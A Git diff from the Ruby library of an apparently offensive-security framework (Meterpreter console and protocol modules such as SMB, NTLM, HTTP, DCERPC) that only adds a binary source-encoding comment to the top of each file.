--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
index c94f860dbc..66cc28d845 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
index 5c94f44a9b..e2d05bfa2a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/interactive_channel.rb b/lib/rex/post/meterpreter/ui/console/interactive_channel.rb
index 4e6cfe29eb..4e26f4d156 100644
--- a/lib/rex/post/meterpreter/ui/console/interactive_channel.rb
+++ b/lib/rex/post/meterpreter/ui/console/interactive_channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/permission.rb b/lib/rex/post/permission.rb
index eb85c9596f..8f16f514ee 100644
--- a/lib/rex/post/permission.rb
+++ b/lib/rex/post/permission.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Generic page protection flags
PROT_NONE = 0
diff --git a/lib/rex/post/process.rb b/lib/rex/post/process.rb
index 8b5a436c44..08c89da7f7 100644
--- a/lib/rex/post/process.rb
+++ b/lib/rex/post/process.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/thread.rb b/lib/rex/post/thread.rb
index f5ca219795..7a09b18136 100644
--- a/lib/rex/post/thread.rb
+++ b/lib/rex/post/thread.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/ui.rb b/lib/rex/post/ui.rb
index b009078138..eca0f3041e 100644
--- a/lib/rex/post/ui.rb
+++ b/lib/rex/post/ui.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/proto.rb b/lib/rex/proto.rb
index ce7c2eb805..923fa4626d 100644
--- a/lib/rex/proto.rb
+++ b/lib/rex/proto.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
require 'rex/proto/smb'
require 'rex/proto/ntlm'
diff --git a/lib/rex/proto.rb.ts.rb b/lib/rex/proto.rb.ts.rb
index 85d5c87b27..3e85f03bdf 100644
--- a/lib/rex/proto.rb.ts.rb
+++ b/lib/rex/proto.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/proto/dcerpc.rb b/lib/rex/proto/dcerpc.rb
index a62f4862b1..168a3ba87b 100644
--- a/lib/rex/proto/dcerpc.rb
+++ b/lib/rex/proto/dcerpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/dcerpc/uuid'
require 'rex/proto/dcerpc/response'
require 'rex/proto/dcerpc/client'
diff --git a/lib/rex/proto/dcerpc.rb.ts.rb b/lib/rex/proto/dcerpc.rb.ts.rb
index 4a908323cd..47e38f9af3 100644
--- a/lib/rex/proto/dcerpc.rb.ts.rb
+++ b/lib/rex/proto/dcerpc.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/test'
require 'rex/proto/dcerpc/uuid.rb.ut'
diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb
index ed24e48e95..928e5eb4bf 100644
--- a/lib/rex/proto/dcerpc/client.rb
+++ b/lib/rex/proto/dcerpc/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/client.rb.ut.rb b/lib/rex/proto/dcerpc/client.rb.ut.rb
index a2e2a99298..0ced7af783 100755
--- a/lib/rex/proto/dcerpc/client.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/client.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/exceptions.rb b/lib/rex/proto/dcerpc/exceptions.rb
index 3d92c209d3..f9b204edd3 100644
--- a/lib/rex/proto/dcerpc/exceptions.rb
+++ b/lib/rex/proto/dcerpc/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/handle.rb b/lib/rex/proto/dcerpc/handle.rb
index e26dded45e..661216a76b 100644
--- a/lib/rex/proto/dcerpc/handle.rb
+++ b/lib/rex/proto/dcerpc/handle.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/handle.rb.ut.rb b/lib/rex/proto/dcerpc/handle.rb.ut.rb
index 720ee0252b..e25031923f 100644
--- a/lib/rex/proto/dcerpc/handle.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/handle.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/ndr.rb b/lib/rex/proto/dcerpc/ndr.rb
index 5f67746b8f..d07bd0e0f5 100644
--- a/lib/rex/proto/dcerpc/ndr.rb
+++ b/lib/rex/proto/dcerpc/ndr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/text"
module Rex
diff --git a/lib/rex/proto/dcerpc/ndr.rb.ut.rb b/lib/rex/proto/dcerpc/ndr.rb.ut.rb
index 07b30d4ed8..70529d0458 100644
--- a/lib/rex/proto/dcerpc/ndr.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/ndr.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb
index d28623c8e8..463a8a8be7 100644
--- a/lib/rex/proto/dcerpc/packet.rb
+++ b/lib/rex/proto/dcerpc/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/packet.rb.ut.rb b/lib/rex/proto/dcerpc/packet.rb.ut.rb
index 95bf456195..a3c62554b0 100644
--- a/lib/rex/proto/dcerpc/packet.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/packet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/response.rb b/lib/rex/proto/dcerpc/response.rb
index 5898381811..cf44ea500f 100644
--- a/lib/rex/proto/dcerpc/response.rb
+++ b/lib/rex/proto/dcerpc/response.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/dcerpc/uuid'
require 'rex/proto/dcerpc/exceptions'
diff --git a/lib/rex/proto/dcerpc/response.rb.ut.rb b/lib/rex/proto/dcerpc/response.rb.ut.rb
index 8ca0aa911b..1914e07170 100644
--- a/lib/rex/proto/dcerpc/response.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/response.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dcerpc/uuid.rb b/lib/rex/proto/dcerpc/uuid.rb
index 10e6993048..f9c39e3279 100644
--- a/lib/rex/proto/dcerpc/uuid.rb
+++ b/lib/rex/proto/dcerpc/uuid.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module DCERPC
diff --git a/lib/rex/proto/dcerpc/uuid.rb.ut.rb b/lib/rex/proto/dcerpc/uuid.rb.ut.rb
index c42e30aa30..e1f36c4ee9 100644
--- a/lib/rex/proto/dcerpc/uuid.rb.ut.rb
+++ b/lib/rex/proto/dcerpc/uuid.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/dhcp.rb b/lib/rex/proto/dhcp.rb
index 57fd3791bb..9a8a036f84 100644
--- a/lib/rex/proto/dhcp.rb
+++ b/lib/rex/proto/dhcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
#
# DHCP Server support written by scriptjunkie
diff --git a/lib/rex/proto/dhcp/constants.rb b/lib/rex/proto/dhcp/constants.rb
index c58f2ea248..c99d74f1bc 100644
--- a/lib/rex/proto/dhcp/constants.rb
+++ b/lib/rex/proto/dhcp/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/proto/dhcp'
diff --git a/lib/rex/proto/dhcp/server.rb b/lib/rex/proto/dhcp/server.rb
index 34e7733a34..abfd39d2d0 100644
--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/socket'
diff --git a/lib/rex/proto/drda.rb b/lib/rex/proto/drda.rb
index 1e66b787aa..751b83a4d4 100644
--- a/lib/rex/proto/drda.rb
+++ b/lib/rex/proto/drda.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda/constants'
require 'rex/proto/drda/packet'
require 'rex/proto/drda/utils'
diff --git a/lib/rex/proto/drda.rb.ts.rb b/lib/rex/proto/drda.rb.ts.rb
index 1c2823ea9b..1e4bcbe7c2 100644
--- a/lib/rex/proto/drda.rb.ts.rb
+++ b/lib/rex/proto/drda.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/test'
diff --git a/lib/rex/proto/drda/constants.rb b/lib/rex/proto/drda/constants.rb
index 7254bade3b..bc6018937f 100644
--- a/lib/rex/proto/drda/constants.rb
+++ b/lib/rex/proto/drda/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda'
module Rex
diff --git a/lib/rex/proto/drda/constants.rb.ut.rb b/lib/rex/proto/drda/constants.rb.ut.rb
index 8bb74303eb..be3e4a82a0 100644
--- a/lib/rex/proto/drda/constants.rb.ut.rb
+++ b/lib/rex/proto/drda/constants.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/drda/packet.rb b/lib/rex/proto/drda/packet.rb
index 4db613a494..e3519f0f02 100644
--- a/lib/rex/proto/drda/packet.rb
+++ b/lib/rex/proto/drda/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda'
module Rex
diff --git a/lib/rex/proto/drda/packet.rb.ut.rb b/lib/rex/proto/drda/packet.rb.ut.rb
index c3792effed..20217c0150 100644
--- a/lib/rex/proto/drda/packet.rb.ut.rb
+++ b/lib/rex/proto/drda/packet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/drda/utils.rb b/lib/rex/proto/drda/utils.rb
index cd877e344a..fab4d6da78 100644
--- a/lib/rex/proto/drda/utils.rb
+++ b/lib/rex/proto/drda/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/drda'
module Rex
diff --git a/lib/rex/proto/drda/utils.rb.ut.rb b/lib/rex/proto/drda/utils.rb.ut.rb
index b7f6fa23fa..fc251f4bff 100644
--- a/lib/rex/proto/drda/utils.rb.ut.rb
+++ b/lib/rex/proto/drda/utils.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb
index a4e0e06071..1ff65061ec 100644
--- a/lib/rex/proto/http.rb
+++ b/lib/rex/proto/http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http/packet'
require 'rex/proto/http/request'
require 'rex/proto/http/response'
diff --git a/lib/rex/proto/http.rb.ts.rb b/lib/rex/proto/http.rb.ts.rb
index 7697ea7d8d..8e241fb401 100644
--- a/lib/rex/proto/http.rb.ts.rb
+++ b/lib/rex/proto/http.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index b5c328e5a8..5f0dcfa0d9 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/proto/http'
require 'rex/text'
diff --git a/lib/rex/proto/http/client.rb.ut.rb b/lib/rex/proto/http/client.rb.ut.rb
index d6a3ab0b45..bb57ff16f9 100644
--- a/lib/rex/proto/http/client.rb.ut.rb
+++ b/lib/rex/proto/http/client.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/handler.rb b/lib/rex/proto/http/handler.rb
index ed35775874..ec78464411 100644
--- a/lib/rex/proto/http/handler.rb
+++ b/lib/rex/proto/http/handler.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module Http
diff --git a/lib/rex/proto/http/handler/erb.rb b/lib/rex/proto/http/handler/erb.rb
index 5f2e3d6551..0719d9cbea 100644
--- a/lib/rex/proto/http/handler/erb.rb
+++ b/lib/rex/proto/http/handler/erb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'erb'
include ERB::Util
diff --git a/lib/rex/proto/http/handler/erb.rb.ut.rb b/lib/rex/proto/http/handler/erb.rb.ut.rb
index 24b4584020..97d808c6ff 100644
--- a/lib/rex/proto/http/handler/erb.rb.ut.rb
+++ b/lib/rex/proto/http/handler/erb.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/rex/proto/http/handler/proc.rb b/lib/rex/proto/http/handler/proc.rb
index 51ea7492d5..03e66a26c2 100644
--- a/lib/rex/proto/http/handler/proc.rb
+++ b/lib/rex/proto/http/handler/proc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'erb'
module Rex
diff --git a/lib/rex/proto/http/handler/proc.rb.ut.rb b/lib/rex/proto/http/handler/proc.rb.ut.rb
index bc572c2a16..26332ab0a7 100644
--- a/lib/rex/proto/http/handler/proc.rb.ut.rb
+++ b/lib/rex/proto/http/handler/proc.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', '..'))
diff --git a/lib/rex/proto/http/header.rb b/lib/rex/proto/http/header.rb
index 5bd4547ca7..e751c64812 100644
--- a/lib/rex/proto/http/header.rb
+++ b/lib/rex/proto/http/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
module Rex
diff --git a/lib/rex/proto/http/header.rb.ut.rb b/lib/rex/proto/http/header.rb.ut.rb
index 7096b6efd4..719d762789 100644
--- a/lib/rex/proto/http/header.rb.ut.rb
+++ b/lib/rex/proto/http/header.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/packet.rb b/lib/rex/proto/http/packet.rb
index 089f80b6d5..d814523745 100644
--- a/lib/rex/proto/http/packet.rb
+++ b/lib/rex/proto/http/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
module Rex
diff --git a/lib/rex/proto/http/packet.rb.ut.rb b/lib/rex/proto/http/packet.rb.ut.rb
index e04f3ee813..193d892b61 100644
--- a/lib/rex/proto/http/packet.rb.ut.rb
+++ b/lib/rex/proto/http/packet.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb
index 088edc4a92..2ff4c6b13a 100644
--- a/lib/rex/proto/http/request.rb
+++ b/lib/rex/proto/http/request.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'uri'
require 'rex/proto/http'
diff --git a/lib/rex/proto/http/request.rb.ut.rb b/lib/rex/proto/http/request.rb.ut.rb
index 9c23ee8b12..e7cf091a6c 100644
--- a/lib/rex/proto/http/request.rb.ut.rb
+++ b/lib/rex/proto/http/request.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb
index 8fa453b639..1d7414e310 100644
--- a/lib/rex/proto/http/response.rb
+++ b/lib/rex/proto/http/response.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
module Rex
diff --git a/lib/rex/proto/http/response.rb.ut.rb b/lib/rex/proto/http/response.rb.ut.rb
index 83553194c1..085d898203 100644
--- a/lib/rex/proto/http/response.rb.ut.rb
+++ b/lib/rex/proto/http/response.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/http/server.rb b/lib/rex/proto/http/server.rb
index 077c15c707..b10dc1e8a5 100644
--- a/lib/rex/proto/http/server.rb
+++ b/lib/rex/proto/http/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/proto/http'
require 'rex/proto/http/handler'
diff --git a/lib/rex/proto/http/server.rb.ut.rb b/lib/rex/proto/http/server.rb.ut.rb
index c656819e0c..c8307ebc5f 100644
--- a/lib/rex/proto/http/server.rb.ut.rb
+++ b/lib/rex/proto/http/server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/iax2.rb b/lib/rex/proto/iax2.rb
index bcf5576de8..47f3cd7f6f 100644
--- a/lib/rex/proto/iax2.rb
+++ b/lib/rex/proto/iax2.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/client'
diff --git a/lib/rex/proto/iax2/call.rb b/lib/rex/proto/iax2/call.rb
index e8e8f315f1..80c1a2c6f9 100644
--- a/lib/rex/proto/iax2/call.rb
+++ b/lib/rex/proto/iax2/call.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/client.rb b/lib/rex/proto/iax2/client.rb
index 9d151bff31..9ae41539c2 100644
--- a/lib/rex/proto/iax2/client.rb
+++ b/lib/rex/proto/iax2/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/constants'
require 'rex/proto/iax2/codecs'
require 'rex/proto/iax2/call'
diff --git a/lib/rex/proto/iax2/codecs.rb b/lib/rex/proto/iax2/codecs.rb
index 2d6fc2d0f5..dbafe4a482 100644
--- a/lib/rex/proto/iax2/codecs.rb
+++ b/lib/rex/proto/iax2/codecs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/iax2/codecs/g711'
require 'rex/proto/iax2/codecs/mulaw'
require 'rex/proto/iax2/codecs/alaw'
diff --git a/lib/rex/proto/iax2/codecs/alaw.rb b/lib/rex/proto/iax2/codecs/alaw.rb
index c2a2d43b43..f011356719 100644
--- a/lib/rex/proto/iax2/codecs/alaw.rb
+++ b/lib/rex/proto/iax2/codecs/alaw.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/codecs/g711.rb b/lib/rex/proto/iax2/codecs/g711.rb
index c35930c9f8..bfbb2e0498 100644
--- a/lib/rex/proto/iax2/codecs/g711.rb
+++ b/lib/rex/proto/iax2/codecs/g711.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/codecs/mulaw.rb b/lib/rex/proto/iax2/codecs/mulaw.rb
index 78d459b15e..25131c7149 100644
--- a/lib/rex/proto/iax2/codecs/mulaw.rb
+++ b/lib/rex/proto/iax2/codecs/mulaw.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/iax2/constants.rb b/lib/rex/proto/iax2/constants.rb
index 15a829c349..bc12c8608d 100644
--- a/lib/rex/proto/iax2/constants.rb
+++ b/lib/rex/proto/iax2/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module IAX2
diff --git a/lib/rex/proto/natpmp.rb b/lib/rex/proto/natpmp.rb
index 4e668cedfb..cf41512b54 100644
--- a/lib/rex/proto/natpmp.rb
+++ b/lib/rex/proto/natpmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# NAT-PMP protocol support
diff --git a/lib/rex/proto/natpmp/constants.rb b/lib/rex/proto/natpmp/constants.rb
index 19e0aa2ccc..c0d119a8c1 100644
--- a/lib/rex/proto/natpmp/constants.rb
+++ b/lib/rex/proto/natpmp/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# NAT-PMP constants
diff --git a/lib/rex/proto/natpmp/packet.rb b/lib/rex/proto/natpmp/packet.rb
index ef91dccbfe..25d6aa72e2 100644
--- a/lib/rex/proto/natpmp/packet.rb
+++ b/lib/rex/proto/natpmp/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# NAT-PMP protocol support
diff --git a/lib/rex/proto/ntlm.rb b/lib/rex/proto/ntlm.rb
index ff416f3733..4d4a52d4de 100644
--- a/lib/rex/proto/ntlm.rb
+++ b/lib/rex/proto/ntlm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/exceptions'
require 'rex/proto/ntlm/crypt'
diff --git a/lib/rex/proto/ntlm.rb.ut.rb b/lib/rex/proto/ntlm.rb.ut.rb
index a19e432d56..3eee949b36 100644
--- a/lib/rex/proto/ntlm.rb.ut.rb
+++ b/lib/rex/proto/ntlm.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/proto/ntlm/base.rb b/lib/rex/proto/ntlm/base.rb
index 8ea76e7870..94c027c91b 100644
--- a/lib/rex/proto/ntlm/base.rb
+++ b/lib/rex/proto/ntlm/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# An NTLM Authentication Library for Ruby
#
diff --git a/lib/rex/proto/ntlm/constants.rb b/lib/rex/proto/ntlm/constants.rb
index 0149ada048..8a78ddae8a 100644
--- a/lib/rex/proto/ntlm/constants.rb
+++ b/lib/rex/proto/ntlm/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module NTLM
diff --git a/lib/rex/proto/ntlm/crypt.rb b/lib/rex/proto/ntlm/crypt.rb
index 63bd1168b8..f7a99efcfb 100644
--- a/lib/rex/proto/ntlm/crypt.rb
+++ b/lib/rex/proto/ntlm/crypt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# An NTLM Authentication Library for Ruby
#
diff --git a/lib/rex/proto/ntlm/exceptions.rb b/lib/rex/proto/ntlm/exceptions.rb
index 2298ecced2..81e5f849f1 100644
--- a/lib/rex/proto/ntlm/exceptions.rb
+++ b/lib/rex/proto/ntlm/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module NTLM
diff --git a/lib/rex/proto/ntlm/message.rb b/lib/rex/proto/ntlm/message.rb
index 2c8485fba6..a8c678e877 100644
--- a/lib/rex/proto/ntlm/message.rb
+++ b/lib/rex/proto/ntlm/message.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# An NTLM Authentication Library for Ruby
#
diff --git a/lib/rex/proto/ntlm/utils.rb b/lib/rex/proto/ntlm/utils.rb
index 379c1448cc..b72c178d6d 100644
--- a/lib/rex/proto/ntlm/utils.rb
+++ b/lib/rex/proto/ntlm/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/ntlm/constants'
require 'rex/proto/ntlm/crypt'
require 'rex/proto/ntlm/exceptions'
diff --git a/lib/rex/proto/proxy/socks4a.rb b/lib/rex/proto/proxy/socks4a.rb
index 211d870e15..abc68cb02c 100644
--- a/lib/rex/proto/proxy/socks4a.rb
+++ b/lib/rex/proto/proxy/socks4a.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# sf - Sept 2010
#
diff --git a/lib/rex/proto/rfb.rb b/lib/rex/proto/rfb.rb
index 1a9aeb0ed9..53e493e4df 100644
--- a/lib/rex/proto/rfb.rb
+++ b/lib/rex/proto/rfb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/rfb.rb.ut.rb b/lib/rex/proto/rfb.rb.ut.rb
index 3333e61d04..d9771e7516 100644
--- a/lib/rex/proto/rfb.rb.ut.rb
+++ b/lib/rex/proto/rfb.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb
index d6fcc0f7ca..216e953945 100644
--- a/lib/rex/proto/rfb/cipher.rb
+++ b/lib/rex/proto/rfb/cipher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb
index 749c70d0be..723a067034 100644
--- a/lib/rex/proto/rfb/client.rb
+++ b/lib/rex/proto/rfb/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb
index be253a470c..fc5517d8a3 100644
--- a/lib/rex/proto/rfb/constants.rb
+++ b/lib/rex/proto/rfb/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: $
##
diff --git a/lib/rex/proto/smb.rb b/lib/rex/proto/smb.rb
index 29c4ce002c..e62785e05f 100644
--- a/lib/rex/proto/smb.rb
+++ b/lib/rex/proto/smb.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/smb/constants'
require 'rex/proto/smb/exceptions'
require 'rex/proto/smb/evasions'
diff --git a/lib/rex/proto/smb.rb.ts.rb b/lib/rex/proto/smb.rb.ts.rb
index cc67bcaa10..26abbcde90 100644
--- a/lib/rex/proto/smb.rb.ts.rb
+++ b/lib/rex/proto/smb.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/test'
require 'rex/proto/smb/client.rb.ut.rb'
diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb
index adb5525681..583b90b2a7 100644
--- a/lib/rex/proto/smb/client.rb
+++ b/lib/rex/proto/smb/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/client.rb.ut.rb b/lib/rex/proto/smb/client.rb.ut.rb
index cdfde5ca0c..e4f3ae046a 100644
--- a/lib/rex/proto/smb/client.rb.ut.rb
+++ b/lib/rex/proto/smb/client.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
